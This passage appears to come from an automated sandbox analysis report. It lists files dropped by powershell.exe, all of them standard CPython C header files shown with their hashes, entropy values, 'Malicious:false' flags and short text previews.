                                                                                                    Preview:#ifndef Py_PYCORECONFIG_H..#define Py_PYCORECONFIG_H..#ifndef Py_LIMITED_API..#ifdef __cplusplus..extern "C" {..#endif..../* --- PyStatus ----------------------------------------------- */....typedef struct {.. enum {.. _PyStatus_TYPE_OK=0,.. _PyStatus_TYPE_ERROR=1,.. _PyStatus_TYPE_EXIT=2.. } _type;.. const char *func;.. const char *err_msg;.. int exitcode;..} PyStatus;....PyAPI_FUNC(PyStatus) PyStatus_Ok(void);..PyAPI_FUNC(PyStatus) PyStatus_Error(const char *err_msg);..PyAPI_FUNC(PyStatus) PyStatus_NoMemory(void);..PyAPI_FUNC(PyStatus) PyStatus_Exit(int exitcode);..PyAPI_FUNC(int) PyStatus_IsError(PyStatus err);..PyAPI_FUNC(int) PyStatus_IsExit(PyStatus err);..PyAPI_FUNC(int) PyStatus_Exception(PyStatus err);..PyAPI_FUNC(PyObject *) _PyErr_SetFromPyStatus(PyStatus status);..../* --- PyWideStringList ------------------------------------------------ */....typedef struct {.. /* If length is greater than zero, items must be non-NULL.. and all
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):398
                                                                                                    Entropy (8bit):5.034285965364742
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:BwS24ds/HQxz2bBAER6QQv8a7Nph6iyeWSbph62oeWSbzRz8PRlzR4KeWuzRM6pd:Bl2R/HQxib2EsQcDXhUnIhYncknUhWPC
                                                                                                    MD5:3D49C40583E099B05F31BED767B5DA8F
                                                                                                    SHA1:2C118B60E9A4335A9EA9673AB8D39D94F56B150F
                                                                                                    SHA-256:07D04990AE07FBEFCDF0DB99ADFD8C1781EAE324A10CE946A837482AA588A679
                                                                                                    SHA-512:A494775D154938A2A65C30703F152628FE6CE03520EFCECA98610B2FDD3355BB7B538D34F13F732C71FDAF4906FD1A89B19753438FEA2D90026288C7D32D0CE3
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_INTERPRETERIDOBJECT_H..# error "this header file must not be included directly"..#endif..../* Interpreter ID Object */....PyAPI_DATA(PyTypeObject) _PyInterpreterID_Type;....PyAPI_FUNC(PyObject *) _PyInterpreterID_New(int64_t);..PyAPI_FUNC(PyObject *) _PyInterpreterState_GetIDObject(PyInterpreterState *);..PyAPI_FUNC(PyInterpreterState *) _PyInterpreterID_LookUp(PyObject *);..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1680
                                                                                                    Entropy (8bit):5.1075478875485105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AYwxib+x6ANvXDT3JxKsr/tf4SstZ3X8X/olw0eQkJZoYiYSBW1G+yIk4zjYS3ot:AYcgY6KnfJmLw0ePJZoPYa+y3WjY8o1z
                                                                                                    MD5:F2EA530A98E222E4BF313F3DFBBE466B
                                                                                                    SHA1:2A57EB788EF5C5B62A5A16AD478795F947D5B53D
                                                                                                    SHA-256:D64EC47C66671FE2B216FD49010D149DF3103A6C8BE0D442E429B1DDA6001F5B
                                                                                                    SHA-512:0048C05043ED750E10A5246F161F555322305C43E675152D2E8A927F774B0F6D41AE535F7185F5406DA5DD4118E04A98C750B186FF73277C9CABEB7B33550485
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_LISTOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. /* Vector of pointers to list elements. list[0] is ob_item[0], etc. */.. PyObject **ob_item;.... /* ob_item contains space for 'allocated' elements. The number.. * currently in use is ob_size... * Invariants:.. * 0 <= ob_size <= allocated.. * len(list) == ob_size.. * ob_item == NULL implies ob_size == allocated == 0.. * list.sort() temporarily sets allocated to -1 to detect mutations... *.. * Items must normally not be NULL, except during construction when.. * the list is not yet visible outside the function that builds it... */.. Py_ssize_t allocated;..} PyListObject;....PyAPI_FUNC(PyObject *) _PyList_Extend(PyListObject *, PyObject *);..PyAPI_FUNC(void) _PyList_DebugMallocStats(FILE *out);..../* Cast argument to PyListObject* type. */..#define _PyList_CAST(op) \.. (assert(Py
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5022
                                                                                                    Entropy (8bit):5.197921354121365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:IfiDJToXS7dco/1uKXHLKdUJfC5JxkM8UrJ4okJ4HYzXy9RSyHGJLrm9lYTBph3p:OiDJUo4KXrKSyjkMWoNHYbmScGT7VeKl
                                                                                                    MD5:74823487B7F6BE5AC48BFC6103D150B3
                                                                                                    SHA1:9859882BFB80C2D1756046415D4E250185D1687E
                                                                                                    SHA-256:053452993BF183144BECB9EF4CD0293D51F022182CEF83C41BB0089DC2B0563D
                                                                                                    SHA-512:1FD8F504305CA5C4201D8D829A71CA4877B555EACC84E49BBBE6D557E79BE7378289ED72D5529BF80A13CAEADC20864F548ACCC2790E627E19314ACF8A0D8493
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_LIMITED_API..#ifndef Py_LONGINTREPR_H..#define Py_LONGINTREPR_H..#ifdef __cplusplus..extern "C" {..#endif....../* This is published for the benefit of "friends" marshal.c and _decimal.c. */..../* Parameters of the integer representation. There are two different.. sets of parameters: one set for 30-bit digits, stored in an unsigned 32-bit.. integer type, and one set for 15-bit digits with each digit stored in an.. unsigned short. The value of PYLONG_BITS_IN_DIGIT, defined either at.. configure time or in pyport.h, is used to decide which digit size to use..... Type 'digit' should be able to hold 2*PyLong_BASE-1, and type 'twodigits'.. should be an unsigned integer type able to hold all integers up to.. PyLong_BASE*PyLong_BASE-1. x_sub assumes that 'digit' is an unsigned type,.. and that overflow is handled by taking the result modulo 2**N for some N >.. PyLong_SHIFT. The majority of the code doesn't care about the precise.. value of PyLong_SHIFT, but t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4779
                                                                                                    Entropy (8bit):5.022578501994966
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fcj9um0J3q3D21C8YjnNSUbK45MvgDrPFZ27GK5SbfTZYQF3QfkDKbko6:05/AYjn4I5MvgDrPFZ2NqfTZYQxQMDQA
                                                                                                    MD5:76A77068FAAB3F960E916EE115BCF625
                                                                                                    SHA1:24F240C23CD6931EACF99C15E4A63B7F9E6F424E
                                                                                                    SHA-256:E098266A6ABB52079966D12F04E34B419CCCA2D5E121F62ABCB523F867A7D972
                                                                                                    SHA-512:B786E7AF8FE60D0C865B3B76DF74E7DB2395A79DEB22210F3A4A292729918B7E39BB33FEFAFB9A4957C5CAD79EE3E24ACA92B101B33D80257D3AA567AF5BEAF0
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_LONGOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) _PyLong_AsInt(PyObject *);....PyAPI_FUNC(int) _PyLong_UnsignedShort_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedInt_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedLong_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedLongLong_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_Size_t_Converter(PyObject *, void *);..../* _PyLong_Frexp returns a double x and an exponent e such that the.. true value is approximately equal to x * 2**e. e is >= 0. x is.. 0.0 if and only if the input is 0 (in which case, e and x are both.. zeroes); otherwise, 0.5 <= abs(x) < 1.0. On overflow, which is.. possible if the number of bits doesn't fit into a Py_ssize_t, sets.. OverflowError and returns -1.0 for x, 0 for e. */..PyAPI_FUNC(double) _PyLong_Frexp(PyLongObject *a, Py_ssize_t *e);....PyAPI_FUNC(PyObject *) PyLong_FromUn
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2324
                                                                                                    Entropy (8bit):5.1886231790241695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:mcgVeqkbYCfCrgNIYXZ0wbRar89MUBuZ27MZkZjedRc3X:mc4kMIn/Ddx9MUG2uijYRE
                                                                                                    MD5:9A825F485A251686003D9229909C7000
                                                                                                    SHA1:E714B79D7CF19589BAF296553437D1BA2DDA0B78
                                                                                                    SHA-256:9FEECE501D4CD48E8F3A233DB4C46BB822A80376361BD5753E76B493CA3A78B8
                                                                                                    SHA-512:A4E110730FC5F2729EA04362811F83849B0D40A47E2579D49FC268A3BBDB6DC5341B0F8AD838D3341C95B1EED57E09DCC11C935FEA7EC3C6469AA15E88120617
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_MEMORYOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_DATA(PyTypeObject) _PyManagedBuffer_Type;..../* The structs are declared here so that macros can work, but they shouldn't.. be considered public. Don't access their fields directly, use the macros.. and functions instead! */..#define _Py_MANAGED_BUFFER_RELEASED 0x001 /* access to exporter blocked */..#define _Py_MANAGED_BUFFER_FREE_FORMAT 0x002 /* free format */....typedef struct {.. PyObject_HEAD.. int flags; /* state flags */.. Py_ssize_t exports; /* number of direct memoryview exports */.. Py_buffer master; /* snapshot buffer obtained from the original exporter */..} _PyManagedBufferObject;....../* memoryview state flags */..#define _Py_MEMORYVIEW_RELEASED 0x001 /* access to master buffer blocked */..#define _Py_MEMORYVIEW_C 0x002 /* C-contiguous layout */..#define _Py_MEMORYVIEW_FORTRAN 0x004 /* Fortran contiguous layout */.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2342
                                                                                                    Entropy (8bit):5.182525087815372
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:scgQlOn4dtx1HEvd7UEQ7zEH75lWIR2QLnEzapVnl9u8wWIReFPEzapVnxUmaR9X:scxT1HYd7UH7z+75MIR2IEgvPTIRcMg4
                                                                                                    MD5:3E864CCED9C81ED0CCDD0D4623ABF286
                                                                                                    SHA1:7F7AB10428BC3BDD687BE5A89CAAAD0A304D1ABB
                                                                                                    SHA-256:38293361CBDFD45DF12E1893BF033C25F2FFE3D9DAD13B0FD3FCBC98C7997C49
                                                                                                    SHA-512:46F24F8BAB51E99F83084F525C23F6AB7DF8E9B958FA49D54D6163CAD8A9F0DD026C8983021ABDFA425D9F88DD1C90A286CFEC8F0F6215C1B15199E124514C83
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_METHODOBJECT_H..# error "this header file must not be included directly"..#endif....// PyCFunctionObject structure....typedef struct {.. PyObject_HEAD.. PyMethodDef *m_ml; /* Description of the C function to call */.. PyObject *m_self; /* Passed as 'self' arg to the C func, can be NULL */.. PyObject *m_module; /* The __module__ attribute, can be anything */.. PyObject *m_weakreflist; /* List of weak references */.. vectorcallfunc vectorcall;..} PyCFunctionObject;....#define _PyCFunctionObject_CAST(func) \.. (assert(PyCFunction_Check(func)), \.. _Py_CAST(PyCFunctionObject*, (func)))......// PyCMethodObject structure....typedef struct {.. PyCFunctionObject func;.. PyTypeObject *mm_class; /* Class that defines this method */..} PyCMethodObject;....#define _PyCMethodObject_CAST(func) \.. (assert(PyCMethod_Check(func)), \.. _Py_CAST(PyCMethodObject*, (func)))....PyAPI_DATA(PyTypeObject) PyCMethod_Type;....#define PyCMethod_C
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4445
                                                                                                    Entropy (8bit):5.05351456250695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:1cVTD7GW+jo5ea+vFI20+3k+PaPF36b2yHzV:Kh7GS5ea++LD36b2w
                                                                                                    MD5:0FC62BC4A9D6795DAC7E83E55F204798
                                                                                                    SHA1:A203F510EECDD8C44F226FA157180516E317B60F
                                                                                                    SHA-256:3DC42D6F9801AFF80BBF0CBF847211A480E78CF4DFA49ECA3CE6A7A784DAF692
                                                                                                    SHA-512:0217D7765833E82E23C217440BB7170469070FA8A557381286FA52C60716BAFC1059ADA59CE9B5BF3B9AC260E391F53B31BA1130B8C1330B1FCDF22C6861BD61
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_MODSUPPORT_H..# error "this header file must not be included directly"..#endif..../* If PY_SSIZE_T_CLEAN is defined, each functions treats #-specifier.. to mean Py_ssize_t */..#ifdef PY_SSIZE_T_CLEAN..#define _Py_VaBuildStack _Py_VaBuildStack_SizeT..#else..PyAPI_FUNC(PyObject *) _Py_VaBuildValue_SizeT(const char *, va_list);..PyAPI_FUNC(PyObject **) _Py_VaBuildStack_SizeT(.. PyObject **small_stack,.. Py_ssize_t small_stack_len,.. const char *format,.. va_list va,.. Py_ssize_t *p_nargs);..#endif....PyAPI_FUNC(int) _PyArg_UnpackStack(.. PyObject *const *args,.. Py_ssize_t nargs,.. const char *name,.. Py_ssize_t min,.. Py_ssize_t max,.. ...);....PyAPI_FUNC(int) _PyArg_NoKeywords(const char *funcname, PyObject *kwargs);..PyAPI_FUNC(int) _PyArg_NoKwnames(const char *funcname, PyObject *kwnames);..PyAPI_FUNC(int) _PyArg_NoPositional(const char *funcname, PyObject *args);..#define _PyArg_NoKeywords(funcname, kwargs) \..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21787
                                                                                                    Entropy (8bit):5.058391137738562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:OgHDxPOeSmmqRrVqH7FeEKyH0qLIoPXY2Lwvu95IWawvc95IWKzYv8Z7v2L2Xkui:OgHdOWmqqHXH0YXZd/S/KzYvoD2L2XkZ
                                                                                                    MD5:DB36423AA52F401070332AC25A6A7432
                                                                                                    SHA1:E20536B95CD39BE7FD1660A758D9E6A060056717
                                                                                                    SHA-256:82EC2077CD103254A2D366CD857E4C734DD261FD750FA39940A3E4975CF8D616
                                                                                                    SHA-512:D78CB02D0F19CA8313065D755B8ACDDFE530BF946AA027E0560E2FC44818FCA797AC9982E444FFEDBA1E6074B7BF8C59F9D66CAD2DF88EC3A9A4317D6D96ED2E
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_OBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void) _Py_NewReference(PyObject *op);..PyAPI_FUNC(void) _Py_NewReferenceNoTotal(PyObject *op);....#ifdef Py_TRACE_REFS../* Py_TRACE_REFS is such major surgery that we call external routines. */..PyAPI_FUNC(void) _Py_ForgetReference(PyObject *);..#endif....#ifdef Py_REF_DEBUG../* These are useful as debugging aids when chasing down refleaks. */..PyAPI_FUNC(Py_ssize_t) _Py_GetGlobalRefTotal(void);..# define _Py_GetRefTotal() _Py_GetGlobalRefTotal()..PyAPI_FUNC(Py_ssize_t) _Py_GetLegacyRefTotal(void);..PyAPI_FUNC(Py_ssize_t) _PyInterpreterState_GetRefTotal(PyInterpreterState *);..#endif....../********************* String Literals ****************************************/../* This structure helps managing static strings. The basic usage goes like this:.. Instead of doing.... r = PyObject_CallMethod(o, "foo", "args", ...);.... do.... _Py_IDENTIFIER(foo);.. ....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3411
                                                                                                    Entropy (8bit):5.0684324671002665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5ccuRtVM6X5Oint5LRqe2TCjPKsTW7QALGsL2V+F7I26:2cuRjMYoizRqe2T5sT0Q2CV+FM26
                                                                                                    MD5:3AAF56D62D3B0F11B109ABAE1037D3E4
                                                                                                    SHA1:F965A602F9F9577EDC4C63CCFDEEEDE17BFDE202
                                                                                                    SHA-256:1A6FE8DD3E89B288DE512CB87DD6BD583D8B5AA4B985BFC0567C6BDA983C4554
                                                                                                    SHA-512:23F9E71F2861CB984238C59A68C7C9BC1DCD5481D16CA1DE1C8D1F16DCBB686C1D63E8DE2A323F4EAA2E1801D8299B2E841ABCD8DADE450D9AF5D956E994D024
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_OBJIMPL_H..# error "this header file must not be included directly"..#endif....static inline size_t _PyObject_SIZE(PyTypeObject *type) {.. return _Py_STATIC_CAST(size_t, type->tp_basicsize);..}..../* _PyObject_VAR_SIZE returns the number of bytes (as size_t) allocated for a.. vrbl-size object with nitems items, exclusive of gc overhead (if any). The.. value is rounded up to the closest multiple of sizeof(void *), in order to.. ensure that pointer fields at the end of the object are correctly aligned.. for the platform (this is of special importance for subclasses of, e.g.,.. str or int, so that pointers can be stored after the embedded data)..... Note that there's no memory wastage in doing this, as malloc has to.. return (at worst) pointer-aligned memory anyway...*/..#if ((SIZEOF_VOID_P - 1) & SIZEOF_VOID_P) != 0..# error "_PyObject_VAR_SIZE requires SIZEOF_VOID_P be a power of 2"..#endif....static inline size_t _PyObject_VAR_SIZE(PyTypeObject *
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1354
                                                                                                    Entropy (8bit):5.183460169106451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:BOpgldiy2tuYrCJLrox9tLNQIY3ncGEWKMS5nHqG+u35XXPgF8waXQijTab:0W3/2sH6x9t+FE2CnKG/toF8zjab
                                                                                                    MD5:6BB61C20651C43AF4A1FEAEAC50B525C
                                                                                                    SHA1:5B4356F048F9385195878B9EA14A3B6044890219
                                                                                                    SHA-256:1C53B02FCE72611A21A403CE367903DDB21F523965179AE5C77D3281EEC1D696
                                                                                                    SHA-512:23A1F65CE542704D84879F6391010881F0F04B799EF9D56CA96D0B6A464F7ACB6A8D9FAB5FBC33D0A306A9849982F5EFA21A5F23A8A5ED4E332172CF85720085
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_ODICTOBJECT_H..#define Py_ODICTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....../* OrderedDict */../* This API is optional and mostly redundant. */....#ifndef Py_LIMITED_API....typedef struct _odictobject PyODictObject;....PyAPI_DATA(PyTypeObject) PyODict_Type;..PyAPI_DATA(PyTypeObject) PyODictIter_Type;..PyAPI_DATA(PyTypeObject) PyODictKeys_Type;..PyAPI_DATA(PyTypeObject) PyODictItems_Type;..PyAPI_DATA(PyTypeObject) PyODictValues_Type;....#define PyODict_Check(op) PyObject_TypeCheck((op), &PyODict_Type)..#define PyODict_CheckExact(op) Py_IS_TYPE((op), &PyODict_Type)..#define PyODict_SIZE(op) PyDict_GET_SIZE((op))....PyAPI_FUNC(PyObject *) PyODict_New(void);..PyAPI_FUNC(int) PyODict_SetItem(PyObject *od, PyObject *key, PyObject *item);..PyAPI_FUNC(int) PyODict_DelItem(PyObject *od, PyObject *key);..../* wrappers around PyDict* functions */..#define PyODict_GetItem(od, key) PyDict_GetItem(_PyObject_CAST(od), (key))..#define PyODict_GetItemWithError(od, key) \.. PyDi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):879
                                                                                                    Entropy (8bit):5.267148701395894
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:UPpna5ooK5reGc4q4rCJ/2p2p2IYQSpdR9p0zFnCp1ep5wyKZDBpsPpQ/6EjZpuK:Z5XKc4sFG43Od//6l/Ul
                                                                                                    MD5:A4C31AF078BC034992677A5AA57E3538
                                                                                                    SHA1:20AE77034D5E188C0948F915E7FB5D5DD8F797B1
                                                                                                    SHA-256:ECB05C81E6EC87A0442DD01FAA6DEA7FF10C81555CB43A8D9D5A0A2EA7E3BE92
                                                                                                    SHA-512:F70D3C6D2B83E91E0D274A0D414BC3522509BB184D12FBFAA8370F2250FE5DB13B44D4B60AAB8BC05B6CA52C4D17286E0716F74A96EE16FD3CCD727548A2C32A
                                                                                                    Malicious:false
                                                                                                    Preview:/* PickleBuffer object. This is built-in for ease of use from third-party.. * C extensions... */....#ifndef Py_PICKLEBUFOBJECT_H..#define Py_PICKLEBUFOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_LIMITED_API....PyAPI_DATA(PyTypeObject) PyPickleBuffer_Type;....#define PyPickleBuffer_Check(op) Py_IS_TYPE((op), &PyPickleBuffer_Type)..../* Create a PickleBuffer redirecting to the given buffer-enabled object */..PyAPI_FUNC(PyObject *) PyPickleBuffer_FromObject(PyObject *);../* Get the PickleBuffer's underlying view to the original object.. * (NULL if released).. */..PyAPI_FUNC(const Py_buffer *) PyPickleBuffer_GetBuffer(PyObject *);../* Release the PickleBuffer. Returns 0 on success, -1 on error. */..PyAPI_FUNC(int) PyPickleBuffer_Release(PyObject *);....#endif /* !Py_LIMITED_API */....#ifdef __cplusplus..}..#endif..#endif /* !Py_PICKLEBUFOBJECT_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3593
                                                                                                    Entropy (8bit):4.90105688574451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Ul3OVclerU8SXnA9mpbB0CD0cEQx9BX4GRm461PbVX58TXsDzz:UZOVcBB7IcEQx9BX4GRm46nGXsT
                                                                                                    MD5:5042956670A8ECA4C543D14B62A8063C
                                                                                                    SHA1:A023CB5E91870D50CD1222D5F0DDF90EBD408E6A
                                                                                                    SHA-256:125515BD49C0BBEFBE7B9A4219EE0F671C70E5E8052277DD1BBB00E08DA76F8F
                                                                                                    SHA-512:7A8795E604886B6C344CAD2596872149B1346A8DE86B86063DCB3F258F8D744502B9D94E501723390FA074B06DBDACC4A7FF7079DB022CF8B9A16A40D827C50E
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PTRHEAD_STUBS_H..#define Py_CPYTHON_PTRHEAD_STUBS_H....#if !defined(HAVE_PTHREAD_STUBS)..# error "this header file requires stubbed pthreads."..#endif....#ifndef _POSIX_THREADS..# define _POSIX_THREADS 1..#endif..../* Minimal pthread stubs for CPython... *.. * The stubs implement the minimum pthread API for CPython... * - pthread_create() fails... * - pthread_exit() calls exit(0)... * - pthread_key_*() functions implement minimal TSS without destructor... * - all other functions do nothing and return 0... */....#ifdef __wasi__..// WASI's bits/alltypes.h provides type definitions when __NEED_ is set...// The header file can be included multiple times...# define __NEED_pthread_cond_t 1..# define __NEED_pthread_condattr_t 1..# define __NEED_pthread_mutex_t 1..# define __NEED_pthread_mutexattr_t 1..# define __NEED_pthread_key_t 1..# define __NEED_pthread_t 1..# define __NEED_pthread_attr_t 1..# include <bits/alltypes.h>..#else..typedef struct { void *__x; } pth
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1426
                                                                                                    Entropy (8bit):5.414626346930993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oUIMUhanrrI1lE2gM6CS5XphKLPIQIG8ImINPxIBIsI2fBAv2Er1ZW:EMUhannI1lEkuXsIQILImIN5IBIsIgB5
                                                                                                    MD5:91891583393561856B0C66D384A1B6E9
                                                                                                    SHA1:6816BAB590022535ED637B1A7FAD8A5DD4C8B33F
                                                                                                    SHA-256:5B0CF2697E86E054D0A0721670D0A8E0318ED9ACB05EA0E93CD543E263F2F97A
                                                                                                    SHA-512:616949A2566F0FEB26C12B2106A3BBFA1CF8BFC8686E75CAE0A5DF679626A06FD7A83364DC4D908993CF12AA300A75A0EE87496A7B66EF7B165369470B06CC03
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_LIMITED_API..#ifndef PYCTYPE_H..#define PYCTYPE_H..#ifdef __cplusplus..extern "C" {..#endif....#define PY_CTF_LOWER 0x01..#define PY_CTF_UPPER 0x02..#define PY_CTF_ALPHA (PY_CTF_LOWER|PY_CTF_UPPER)..#define PY_CTF_DIGIT 0x04..#define PY_CTF_ALNUM (PY_CTF_ALPHA|PY_CTF_DIGIT)..#define PY_CTF_SPACE 0x08..#define PY_CTF_XDIGIT 0x10....PyAPI_DATA(const unsigned int) _Py_ctype_table[256];..../* Unlike their C counterparts, the following macros are not meant to.. * handle an int with any of the values [EOF, 0-UCHAR_MAX]. The argument.. * must be a signed/unsigned char. */..#define Py_ISLOWER(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_LOWER)..#define Py_ISUPPER(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_UPPER)..#define Py_ISALPHA(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_ALPHA)..#define Py_ISDIGIT(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_DIGIT)..#define Py_ISXDIGIT(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_XDIGIT)..#define Py_ISALNUM(c) (_Py_ctype_table[Py_C
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1451
                                                                                                    Entropy (8bit):5.316330902074438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ohgc9wFHjttJJutAjI/O/qsDva65TAIN0OgxcKkubNJUg8:Qf9wFHjttJItAjMO/bDvaGXN0dkGNp8
                                                                                                    MD5:AF8BC9EFAD59DF43AF0AB0916983E807
                                                                                                    SHA1:F13FF49E7B7117D0D4C3D87FFB4EB53BEBED61F3
                                                                                                    SHA-256:3A12471FFF6DC26957CC4C8A540D291B1DBB4D1CA1E2181538272520CBBC5077
                                                                                                    SHA-512:BC75CAD4387204F8D4B466E1EBD8F7BCEFD3BF31A180B182B631A6CEAA680FEBB16DD54916547BD3E30CDFAE08C0F48D6676B71F33863693A03BB97E956C0186
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_LIMITED_API..#ifndef Py_PYDEBUG_H..#define Py_PYDEBUG_H..#ifdef __cplusplus..extern "C" {..#endif....Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_DebugFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_VerboseFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_QuietFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_InteractiveFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_InspectFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_OptimizeFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_NoSiteFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_BytesWarningFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_FrozenFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_IgnoreEnvironmentFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_DontWriteBytecodeFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_NoUserSiteDirectory;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_UnbufferedStdioFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_HashRandomizationFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_IsolatedFlag;....#ifdef MS_WINDOWS..Py_DEPRECATED(3.12) P
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4454
                                                                                                    Entropy (8bit):5.035902312634121
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dHcbUkGrBZcmQ4xTmCHijFHd+vqALj5CpJQCupUDuUe:ObJOZcDcqCHQBsNH5CHQCupUDuUe
                                                                                                    MD5:864B9D08D0E1F82FB1752036D44E0D6F
                                                                                                    SHA1:0617481BC794800CEB0030E5D757B7BBC858D14D
                                                                                                    SHA-256:51F18CC3DB616DD36AF97D54471D31557BFAD155CFCF65875CB8F4954CF1566E
                                                                                                    SHA-512:78ED571BB9FDEA3BC5504BBC5E6C039C114C1D7C5867435A06C3DD91A77989B128348C2444481A7D3AD36B0A5940F4E594AC4812B97E715749ED8E509AE717A4
                                                                                                    Malicious:false
